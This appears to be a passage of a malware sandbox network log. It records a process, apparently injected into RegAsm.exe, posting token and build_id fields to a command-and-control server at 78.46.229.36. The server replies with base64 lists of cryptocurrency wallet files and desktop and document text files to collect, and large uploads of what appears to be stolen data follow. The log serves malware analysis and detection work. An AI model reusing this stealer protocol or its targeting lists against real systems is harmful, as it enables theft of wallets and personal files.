                                                                                                                                                                                                                                                  2024-03-29 11:08:19 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                  Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  19192.168.2.44976278.46.229.364437564C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-03-29 11:08:19 UTC310OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----DHDAFBFCFHIDAKFIIEBA
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-03-29 11:08:19 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 44 41 46 42 46 43 46 48 49 44 41 4b 46 49 49 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 35 35 36 35 65 31 35 33 31 36 35 34 35 38 37 38 33 39 37 39 66 38 39 31 35 63 65 38 31 65 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 41 46 42 46 43 46 48 49 44 41 4b 46 49 49 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 30 30 32 37 65 33 35 66 36 63 62 35 34 38 34 38 30 61 36 66 62 38 62 64 37 63 64 65 30 63 66 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 41 46 42 46 43 46 48 49 44 41 4b 46 49 49 45 42 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------DHDAFBFCFHIDAKFIIEBAContent-Disposition: form-data; name="token"a5565e153165458783979f8915ce81e0------DHDAFBFCFHIDAKFIIEBAContent-Disposition: form-data; name="build_id"90027e35f6cb548480a6fb8bd7cde0cf------DHDAFBFCFHIDAKFIIEBACont
                                                                                                                                                                                                                                                  2024-03-29 11:08:20 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:08:20 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-03-29 11:08:20 UTC131INData Raw: 37 38 0d 0a 52 47 56 6d 59 58 56 73 64 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 52 38 4e 54 42 38 64 48 4a 31 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 5a 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 77 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 78RGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp8ZGVza3RvcHwlREVTS1RPUCVcfCoudHh0fDUwfGZhbHNlfCp3aW5kb3dzKnw=0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  20192.168.2.44976378.46.229.364437564C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-03-29 11:08:20 UTC310OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----AFHDBGHJKFIDHJJJEBKE
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Content-Length: 453
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-03-29 11:08:20 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 35 35 36 35 65 31 35 33 31 36 35 34 35 38 37 38 33 39 37 39 66 38 39 31 35 63 65 38 31 65 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 30 30 32 37 65 33 35 66 36 63 62 35 34 38 34 38 30 61 36 66 62 38 62 64 37 63 64 65 30 63 66 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------AFHDBGHJKFIDHJJJEBKEContent-Disposition: form-data; name="token"a5565e153165458783979f8915ce81e0------AFHDBGHJKFIDHJJJEBKEContent-Disposition: form-data; name="build_id"90027e35f6cb548480a6fb8bd7cde0cf------AFHDBGHJKFIDHJJJEBKECont
                                                                                                                                                                                                                                                  2024-03-29 11:08:21 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:08:21 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-03-29 11:08:21 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  21192.168.2.44976478.46.229.364437564C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-03-29 11:08:22 UTC313OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----GCBGCAFIIECBFIDHIJKF
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Content-Length: 130713
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-03-29 11:08:22 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 35 35 36 35 65 31 35 33 31 36 35 34 35 38 37 38 33 39 37 39 66 38 39 31 35 63 65 38 31 65 30 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 30 30 32 37 65 33 35 66 36 63 62 35 34 38 34 38 30 61 36 66 62 38 62 64 37 63 64 65 30 63 66 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------GCBGCAFIIECBFIDHIJKFContent-Disposition: form-data; name="token"a5565e153165458783979f8915ce81e0------GCBGCAFIIECBFIDHIJKFContent-Disposition: form-data; name="build_id"90027e35f6cb548480a6fb8bd7cde0cf------GCBGCAFIIECBFIDHIJKFCont
                                                                                                                                                                                                                                                  2024-03-29 11:08:22 UTC16355OUTData Raw: 2b 66 35 31 2b 4d 31 6b 74 7a 39 67 67 57 45 4e 65 57 61 76 38 41 38 68 71 2f 2f 77 43 76 69 54 2f 30 49 31 36 6a 47 61 38 75 31 66 38 41 35 44 56 39 2f 77 42 66 45 6e 2f 6f 52 72 36 6e 67 2f 38 41 6a 56 50 52 66 6d 66 4c 63 56 2f 77 61 66 71 2f 79 4b 64 46 46 46 66 65 6e 78 41 55 47 69 69 67 42 4b 39 44 2b 46 33 2f 41 43 4c 2b 6f 66 38 41 59 52 6b 2f 39 41 53 76 50 63 56 36 46 38 4c 76 2b 52 66 31 44 2f 73 49 79 66 38 41 6f 43 56 38 2f 6e 76 2f 41 43 36 39 58 2b 52 39 68 77 74 2f 44 78 50 70 48 38 7a 74 36 35 76 77 35 34 6b 6c 31 6e 55 74 51 74 4a 6f 34 6c 38 6a 35 6f 2f 4c 42 79 46 33 73 75 31 38 2f 77 41 58 79 67 38 65 76 74 58 51 54 7a 78 57 74 76 4a 63 54 4f 45 69 69 55 75 37 48 6f 41 4f 53 61 38 72 38 4b 2b 4b 62 62 54 39 56 31 54 56 4c 71 4c 2f 41
                                                                                                                                                                                                                                                  Data Ascii: +f51+M1ktz9ggWENeWav8A8hq//wCviT/0I16jGa8u1f8A5DV9/wBfEn/oRr6ng/8AjVPRfmfLcV/wafq/yKdFFFfenxAUGiigBK9D+F3/ACL+of8AYRk/9ASvPcV6F8Lv+Rf1D/sIyf8AoCV8/nv/AC69X+R9hwt/DxPpH8zt65vw54kl1nUtQtJo4l8j5o/LByF3su18/wAXyg8evtXQTzxWtvJcTOEiiUu7HoAOSa8r8K+KbbT9V1TVLqL/A
                                                                                                                                                                                                                                                  2024-03-29 11:08:22 UTC16355OUTData Raw: 66 38 41 41 30 6c 46 46 6b 50 55 59 30 54 72 31 46 4d 71 77 48 49 37 30 70 63 4e 39 35 51 61 56 68 38 7a 4b 31 46 54 6d 4f 4e 75 68 49 2b 74 4d 61 42 2f 34 66 6d 48 74 53 73 55 70 49 6a 4e 49 65 6c 4b 51 52 31 47 4b 4f 61 42 6f 62 52 53 30 68 6f 47 4a 52 53 30 55 78 69 55 6c 4c 52 51 46 78 4b 53 6c 6f 6f 47 4e 35 70 65 61 4b 44 51 4d 51 30 6c 4c 53 55 44 51 59 70 4b 57 67 30 77 45 49 70 74 4f 6f 78 51 4d 61 4b 44 53 38 55 6c 41 78 44 53 64 71 64 53 59 70 44 47 34 70 50 77 70 78 46 4a 33 70 32 47 49 52 78 53 66 35 36 55 75 4b 55 30 57 47 68 68 47 4b 53 6e 30 32 67 59 68 35 6f 4e 4c 53 59 37 30 68 6a 53 50 78 70 44 54 7a 6a 70 33 70 4b 51 78 6d 4f 61 4f 33 34 30 37 48 46 4e 78 7a 36 59 70 32 47 49 65 74 4a 6a 50 65 6c 49 6f 35 77 61 51 78 4b 54 48 50 34 55
                                                                                                                                                                                                                                                  Data Ascii: f8AA0lFFkPUY0Tr1FMqwHI70pcN95QaVh8zK1FTmONuhI+tMaB/4fmHtSsUpIjNIelKQR1GKOaBobRS0hoGJRS0UxiUlLRQFxKSlooGN5peaKDQMQ0lLSUDQYpKWg0wEIptOoxQMaKDS8UlAxDSdqdSYpDG4pPwpxFJ3p2GIRxSf56UuKU0WGhhGKSn02gYh5oNLSY70hjSPxpDTzjp3pKQxmOaO3407HFNxz6Yp2GIetJjPelIo5waQxKTHP4U
                                                                                                                                                                                                                                                  2024-03-29 11:08:22 UTC16355OUTData Raw: 58 42 42 6c 53 45 68 54 6e 6b 38 47 54 41 4a 79 42 77 42 56 53 30 79 6c 67 6f 75 74 4f 6e 6e 76 55 74 78 62 4c 64 51 7a 2b 57 73 71 4b 6f 56 50 4d 51 71 32 53 41 41 4d 71 79 35 41 48 66 6d 74 6f 7a 78 66 4d 6f 79 76 62 72 36 36 37 66 67 63 30 71 57 42 35 48 4f 50 4c 66 70 36 61 62 2b 64 72 39 7a 52 67 75 6f 5a 4e 53 74 62 4a 35 5a 46 4e 7a 5a 51 53 71 37 59 77 73 30 73 53 73 6f 50 48 33 64 7a 41 65 32 65 76 46 4a 48 63 6e 7a 62 65 32 6b 56 31 75 32 67 45 38 38 5a 48 45 51 62 6c 46 50 63 4e 74 77 78 2f 77 42 34 44 74 57 66 4c 47 4c 79 78 2b 62 54 37 79 43 2f 46 70 42 62 6d 58 37 53 72 52 74 35 61 71 6f 59 4a 35 59 49 4a 43 35 2b 38 61 6b 6d 65 36 65 2f 31 6a 55 6d 73 5a 54 63 61 67 37 4f 69 69 59 2f 75 57 4c 41 35 7a 67 62 73 41 45 59 50 72 37 56 74 53 6e
                                                                                                                                                                                                                                                  Data Ascii: XBBlSEhTnk8GTAJyBwBVS0ylgoutOnnvUtxbLdQz+WsqKoVPMQq2SAAMqy5AHfmtozxfMoyvbr667fgc0qWB5HOPLfp6ab+dr9zRguoZNStbJ5ZFNzZQSq7Yws0sSsoPH3dzAe2evFJHcnzbe2kV1u2gE88ZHEQblFPcNtwx/wB4DtWfLGLyx+bT7yC/FpBbmX7SrRt5aqoYJ5YIJC5+8akme6e/1jUmsZTcag7OiiY/uWLA5zgbsAEYPr7VtSn
                                                                                                                                                                                                                                                  2024-03-29 11:08:22 UTC16355OUTData Raw: 31 53 31 55 2f 74 4b 30 4f 50 6d 66 2f 41 4c 35 6f 2f 74 4b 30 2f 76 50 2f 41 4e 38 30 75 56 39 67 73 79 34 4f 74 49 61 71 66 32 6c 61 66 33 33 2f 41 4f 2b 61 50 37 54 74 4f 50 6e 66 2f 76 6d 6a 6c 66 59 4c 4d 74 30 76 57 71 67 31 4f 7a 2f 76 76 2f 33 7a 52 2f 61 56 6e 33 6b 63 66 38 42 6f 35 58 32 48 59 74 30 74 55 78 71 56 6e 6e 2f 57 50 2f 33 7a 54 76 37 54 73 68 2f 79 30 66 38 41 37 35 6f 35 58 32 45 57 65 39 61 47 6b 2f 38 41 48 2b 50 39 78 2f 38 41 30 45 31 6a 66 32 6e 59 6e 72 4b 34 2f 77 43 41 31 50 61 36 31 5a 32 30 33 6d 72 49 78 49 56 67 41 56 39 51 52 57 64 57 6e 4b 55 47 6b 68 57 5a 7a 4c 39 65 6d 61 6a 4a 2f 47 6e 4f 32 54 55 5a 72 31 46 70 46 48 52 46 43 45 30 77 2b 39 4b 33 76 54 53 61 6c 73 30 51 64 36 51 6e 4f 61 4d 38 39 4b 51 31 4c 4b
                                                                                                                                                                                                                                                  Data Ascii: 1S1U/tK0OPmf/AL5o/tK0/vP/AN80uV9gsy4OtIaqf2laf33/AO+aP7TtOPnf/vmjlfYLMt0vWqg1Oz/vv/3zR/aVn3kcf8Bo5X2HYt0tUxqVnn/WP/3zTv7Tsh/y0f8A75o5X2EWe9aGk/8AH+P9x/8A0E1jf2nYnrK4/wCA1Pa61Z203mrIxIVgAV9QRWdWnKUGkhWZzL9emajJ/GnO2TUZr1FpFHRFCE0w+9K3vTSals0Qd6QnOaM89KQ1LK
                                                                                                                                                                                                                                                  2024-03-29 11:08:22 UTC16355OUTData Raw: 36 5a 48 75 4a 6e 6c 5a 46 32 4b 7a 6e 4a 41 36 34 7a 2b 4e 59 64 68 71 64 35 71 45 74 67 31 33 44 59 4c 48 65 4b 38 4b 47 47 33 6a 51 78 75 36 6b 4a 30 41 7a 68 39 76 4a 79 66 66 6b 35 53 43 2b 75 5a 37 71 79 30 59 32 30 53 33 46 33 5a 41 6d 5a 31 43 74 46 64 53 6e 66 45 43 65 6f 47 41 69 6b 66 37 62 47 71 6c 6a 34 78 6b 75 61 47 76 38 41 77 35 4e 50 4b 61 6b 34 76 6b 71 4c 6c 32 66 72 64 47 78 52 57 4e 44 72 69 65 52 72 30 73 4e 33 70 64 70 42 5a 58 46 6e 61 77 58 6c 2f 5a 2b 63 73 67 78 4c 35 6a 59 45 62 6e 4c 4d 4d 38 67 63 41 44 49 78 53 6e 55 37 69 65 38 31 54 53 37 47 30 74 62 58 55 59 37 36 66 46 6e 66 49 6b 68 6e 68 32 35 52 49 70 4d 4d 45 63 59 62 67 46 63 37 68 68 69 51 42 57 58 39 72 30 32 39 49 2f 31 70 2f 6d 62 76 68 32 73 6b 6d 35 72 2b 72
                                                                                                                                                                                                                                                  Data Ascii: 6ZHuJnlZF2KznJA64z+NYdhqd5qEtg13DYLHeK8KGG3jQxu6kJ0Azh9vJyffk5SC+uZ7qy0Y20S3F3ZAmZ1CtFdSnfECeoGAikf7bGqlj4xkuaGv8Aw5NPKak4vkqLl2frdGxRWNDrieRr0sN3pdpBZXFnawXl/Z+csgxL5jYEbnLMM8gcADIxSnU7ie81TS7G0tbXUY76fFnfIkhnh25RIpMMEcYbgFc7hhiQBWX9r029I/1p/mbvh2skm5r+r
                                                                                                                                                                                                                                                  2024-03-29 11:08:22 UTC16355OUTData Raw: 46 42 6f 6f 41 53 6b 70 61 53 67 59 47 6b 6f 6f 6f 4b 73 49 61 44 51 61 53 67 45 46 49 61 57 6b 6f 47 47 61 54 4e 46 4a 51 55 42 70 4b 4d 30 55 41 4a 53 47 6c 70 43 61 42 69 59 6f 6f 7a 52 51 55 4a 52 52 53 55 44 51 55 68 34 70 61 51 2b 39 41 78 4b 53 6c 6f 4e 41 43 66 35 36 30 68 50 46 4b 61 54 6f 4b 42 68 6d 6b 50 53 6c 4e 49 61 42 6f 53 6a 72 52 32 6f 70 6a 45 7a 53 48 6d 67 30 76 51 55 68 69 55 68 4e 4c 37 30 6d 61 43 6b 48 72 53 5a 7a 53 30 68 35 6f 41 4f 6c 49 63 65 6e 65 6c 70 43 66 30 6f 47 4a 6d 67 69 69 6b 7a 54 47 67 7a 53 41 55 76 36 55 6c 49 59 44 47 50 61 6b 7a 53 6e 70 53 5a 6f 47 41 34 48 74 53 65 39 4c 7a 53 5a 2f 79 61 59 42 31 2b 6e 76 53 48 4f 4f 6c 4b 65 76 57 6b 4a 70 44 45 2b 74 46 4c 31 70 4f 76 61 6d 4d 51 39 61 4f 6e 54 6a 36 55
                                                                                                                                                                                                                                                  Data Ascii: FBooASkpaSgYGkoooKsIaDQaSgEFIaWkoGGaTNFJQUBpKM0UAJSGlpCaBiYoozRQUJRRSUDQUh4paQ+9AxKSloNACf560hPFKaToKBhmkPSlNIaBoSjrR2opjEzSHmg0vQUhiUhNL70maCkHrSZzS0h5oAOlIcenelpCf0oGJmgiikzTGgzSAUv6UlIYDGPakzSnpSZoGA4HtSe9LzSZ/yaYB1+nvSHOOlKevWkJpDE+tFL1pOvamMQ9aOnTj6U
                                                                                                                                                                                                                                                  2024-03-29 11:08:22 UTC16228OUTData Raw: 6e 38 55 64 6e 2f 58 51 37 4b 4f 4a 78 56 43 6c 4f 67 6b 2b 57 57 36 61 2f 72 55 6c 70 4b 6c 61 33 75 55 69 69 6b 65 7a 75 6c 6a 6d 78 35 54 6d 42 39 72 35 47 66 6c 4f 4d 48 67 45 38 56 57 38 2b 50 79 6a 4c 75 2f 64 67 68 53 2f 59 45 35 77 4d 2b 76 42 2f 4b 75 74 56 49 50 5a 6e 49 36 56 52 62 78 66 33 45 6c 4c 6d 6c 75 59 35 62 50 79 2f 74 63 45 39 76 35 6e 2b 72 38 36 4a 6b 33 2f 41 45 79 4f 65 76 61 6e 54 77 54 32 6b 69 78 33 56 76 50 62 75 34 4a 56 5a 6f 6d 51 73 42 36 5a 41 7a 51 71 6b 48 73 77 64 47 6f 72 74 78 65 6e 6b 52 30 55 55 56 5a 6d 4c 54 58 47 55 59 44 75 4b 58 6b 53 52 70 74 66 66 4b 41 59 31 32 6e 4c 67 6e 41 32 6a 76 6b 2b 6c 49 6a 2b 59 38 61 49 73 68 61 55 62 6f 31 32 48 4c 6a 6e 6b 63 63 39 44 30 39 44 57 63 70 51 61 61 62 33 4e 61 63
                                                                                                                                                                                                                                                  Data Ascii: n8Udn/XQ7KOJxVClOgk+WW6a/rUlpKla3uUiikezuljmx5TmB9r5GflOMHgE8VW8+PyjLu/dghS/YE5wM+vB/KutVIPZnI6VRbxf3ElLmluY5bPy/tcE9v5n+r86Jk3/AEyOevanTwT2kix3VvPbu4JVZomQsB6ZAzQqkHswdGortxenkR0UUVZmLTXGUYDuKXkSRptffKAY12nLgnA2jvk+lIj+Y8aIshaUbo12HLjnkcc9D09DWcpQaab3Nac
                                                                                                                                                                                                                                                  2024-03-29 11:08:24 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:08:23 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-03-29 11:08:24 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  22192.168.2.44976578.46.229.364437564C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-03-29 11:08:24 UTC310OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----DHIECGCAEBFIIDHIDGIE
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-03-29 11:08:24 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 35 35 36 35 65 31 35 33 31 36 35 34 35 38 37 38 33 39 37 39 66 38 39 31 35 63 65 38 31 65 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 30 30 32 37 65 33 35 66 36 63 62 35 34 38 34 38 30 61 36 66 62 38 62 64 37 63 64 65 30 63 66 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 44 47 49 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------DHIECGCAEBFIIDHIDGIEContent-Disposition: form-data; name="token"a5565e153165458783979f8915ce81e0------DHIECGCAEBFIIDHIDGIEContent-Disposition: form-data; name="build_id"90027e35f6cb548480a6fb8bd7cde0cf------DHIECGCAEBFIIDHIDGIECont
                                                                                                                                                                                                                                                  2024-03-29 11:08:25 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:08:25 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-03-29 11:08:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  23192.168.2.44976678.46.229.364437564C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-03-29 11:08:26 UTC310OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----GHDHDBAECGCAFHJJDAKF
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-03-29 11:08:26 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 48 44 42 41 45 43 47 43 41 46 48 4a 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 35 35 36 35 65 31 35 33 31 36 35 34 35 38 37 38 33 39 37 39 66 38 39 31 35 63 65 38 31 65 30 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 44 42 41 45 43 47 43 41 46 48 4a 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 30 30 32 37 65 33 35 66 36 63 62 35 34 38 34 38 30 61 36 66 62 38 62 64 37 63 64 65 30 63 66 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 44 42 41 45 43 47 43 41 46 48 4a 4a 44 41 4b 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------GHDHDBAECGCAFHJJDAKFContent-Disposition: form-data; name="token"a5565e153165458783979f8915ce81e0------GHDHDBAECGCAFHJJDAKFContent-Disposition: form-data; name="build_id"90027e35f6cb548480a6fb8bd7cde0cf------GHDHDBAECGCAFHJJDAKFCont
                                                                                                                                                                                                                                                  2024-03-29 11:08:27 UTC158INHTTP/1.1 200 OK
